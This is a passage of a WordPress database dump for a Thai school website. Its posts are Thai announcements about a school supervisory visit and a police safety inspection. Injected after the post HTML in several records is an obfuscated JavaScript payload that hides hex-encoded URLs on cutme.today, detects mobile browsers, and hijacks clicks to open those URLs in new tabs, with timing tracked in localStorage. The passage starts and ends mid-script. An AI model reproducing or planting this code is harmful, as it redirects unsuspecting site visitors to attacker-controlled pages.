)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-20','','','2024-08-01 20:36:02','2024-08-01 13:36:02','',0,'http://pakhaeng.ssk.in.th/?p=392',0,'post','',0),
(393,1,'2024-08-01 20:35:32','2024-08-01 13:35:32','','8-67','','inherit','','closed','','8-67','','','2024-08-01 20:35:32','2024-08-01 13:35:32','',392,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/8-67.png',0,'attachment','image/png',0),
(394,1,'2024-08-01 20:36:00','2024-08-01 13:36:00','<!-- wp:paragraph -->\n<p><strong></strong><strong> </strong><strong></strong><strong>วันที่ 28 กุมภาพันธ์ 2567 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ นำโดยท่านผู้อำนวยการ</strong><strong>เสน่หา</strong><strong> </strong><strong>พลโสภา และคณะครู</strong><strong> </strong><strong></strong><strong>ได้ต้อนรับคณะนิเทศ กำ กับติดตาม ตามการกำกับ ติดตาม โครงการสร้างมูลค่าเพิ่มผลผลิตกับชุมชน และภาคีเครือข่าย</strong><strong></strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>เพื่ออาหารนักเรียนในโรงเรียน</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":393,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/8-67-724x1024.png\" alt=\"\" class=\"wp-image-393\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','inherit','closed','closed','','392-revision-v1','','','2024-08-01 20:36:00','2024-08-01 13:36:00','',392,'http://pakhaeng.ssk.in.th/?p=394',0,'revision','',0),
(395,1,'2024-08-01 20:36:54','2024-08-01 13:36:54','<!-- wp:paragraph -->\n<p><strong></strong><strong>เมื่อวันที่ 29 กุมภาพันธ์ 2567</strong><strong></strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>ร้อยตำรวจเอกธนวรรธน์ พูนทวีวรกิตติ์ </strong><strong>รองสารวัตรป้องกันปราบปราม สภ.โนนคูณ พร้อมด้วยคณะ ได้ออกตรวจเวรประจำวัน ที่โรงเรียนบ้านหนองปลาเข็ง กอไหล่ เพื่อตรวจความเรียบร้อย และปลอดภัยในสถานศึกษา โดยมี</strong><strong>นางเสน่หา พลโสภา</strong><strong> ผู้อำนวยการโรงเรียน พร้อมด้วยคณะครู ได้อำนวยความสะดวก ในการออกตรวจ ในครั้งนี้</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":396,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/9-67-724x1024.png\" alt=\"\" class=\"wp-image-396\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return 